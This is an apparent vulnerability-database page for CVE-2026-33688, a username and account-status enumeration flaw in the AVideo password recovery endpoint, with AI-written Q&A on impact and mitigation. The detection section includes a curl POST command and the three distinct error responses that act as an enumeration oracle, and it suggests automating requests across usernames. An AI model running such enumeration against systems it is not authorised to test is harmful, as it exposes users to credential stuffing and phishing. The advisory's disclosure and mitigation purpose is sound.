CVE-2026-33688
Received Received - Intake
Username Enumeration in WWBN AVideo Password Recovery Endpoint

Publication date: 2026-03-23

Last updated on: 2026-03-25

Assigner: GitHub, Inc.

Description
WWBN AVideo is an open source video platform. In versions up to and including 26.0, the password recovery endpoint at `objects/userRecoverPass.php` performs user existence and account status checks before validating the captcha. This allows an unauthenticated attacker to enumerate valid usernames and determine whether accounts are active, inactive, or banned β€” at scale and without solving any captcha β€” by observing three distinct JSON error responses. Commit e42f54123b460fd1b2ee01f2ce3d4a386e88d157 contains a patch.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-03-23
Last Modified
2026-03-25
Generated
2026-05-07
AI Q&A
2026-03-23
EPSS Evaluated
2026-05-05
NVD
CVE-2026-33688
EUVD
EUVD-2026-14498
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
wwbn avideo to 26.0 (inc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-204 The product provides different responses to incoming requests in a way that reveals internal state information to an unauthorized actor outside of the intended control sphere.
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?

[{'type': 'paragraph', 'content': "CVE-2026-33688 is a vulnerability in the WWBN AVideo platform's password recovery endpoint (`objects/userRecoverPass.php`) in versions up to and including 26.0. The issue arises because the endpoint checks if a user exists and their account status before validating the captcha. This allows an unauthenticated attacker to enumerate valid usernames and determine whether accounts are active, inactive, or banned by observing three distinct JSON error responses, all without solving any captcha."}, {'type': 'paragraph', 'content': 'Specifically, the endpoint returns different error messages for non-existent users, inactive users, and active users, which can be used as an oracle to reveal user information at scale. There is no rate limiting or brute force protection on this endpoint, making automated enumeration feasible.'}] [2]


How can this vulnerability impact me? :

This vulnerability can impact you by allowing attackers to enumerate valid usernames and determine account statuses without authentication or captcha solving. This information disclosure can facilitate several malicious activities:

  • Username Enumeration: Attackers can identify registered usernames.
  • Account Status Disclosure: Attackers can distinguish active, inactive, and banned accounts.
  • Credential Stuffing Facilitation: Valid usernames can be targeted in brute-force or credential stuffing attacks.
  • Phishing Risk: Knowledge of valid active accounts enables targeted social engineering attacks.
  • Automated Enumeration: Lack of rate limiting allows high-speed automated attacks.

How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:

I don't know


How can this vulnerability be detected on my network or system? Can you suggest some commands?

[{'type': 'paragraph', 'content': 'This vulnerability can be detected by sending requests to the password recovery endpoint `objects/userRecoverPass.php` with different usernames and observing the JSON error responses without providing a captcha.'}, {'type': 'list_item', 'content': 'Query a non-existent username and observe if the response contains the error message "User not found".'}, {'type': 'list_item', 'content': 'Query a valid active username and observe if the response contains the error message "Captcha is empty", indicating the user exists and is active.'}, {'type': 'list_item', 'content': 'Query an inactive or banned username and observe if the response contains the error message "The user is not active".'}, {'type': 'paragraph', 'content': 'These distinct responses allow an attacker to enumerate valid usernames and determine account statuses without solving any captcha.'}, {'type': 'paragraph', 'content': 'Example command using curl to test a username (replace USERNAME and URL accordingly):'}, {'type': 'list_item', 'content': 'curl -X POST -d "user=USERNAME" https://your-avideo-instance.com/objects/userRecoverPass.php'}, {'type': 'paragraph', 'content': 'By automating such requests with different usernames and analyzing the JSON responses, you can detect if the vulnerability exists on your system.'}] [2]


What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include modifying the password recovery endpoint to validate the captcha before performing any user existence or account status checks.

  • Enforce captcha validation upfront: Return an error if the captcha is missing or invalid before checking the username.
  • Return a generic success message regardless of whether the user exists or their status, to prevent information disclosure.
  • Implement rate limiting on the password recovery endpoint to prevent automated bulk enumeration attempts.
  • Apply the patch from commit e42f54123b460fd1b2ee01f2ce3d4a386e88d157 which enforces captcha validation and improves error handling.

These steps will prevent attackers from enumerating usernames and account statuses without solving captchas and reduce the risk of automated abuse.


Ask Our AI Assistant
Need more information? Ask your question to get an AI reply (Powered by our expertise)
0/70
EPSS Chart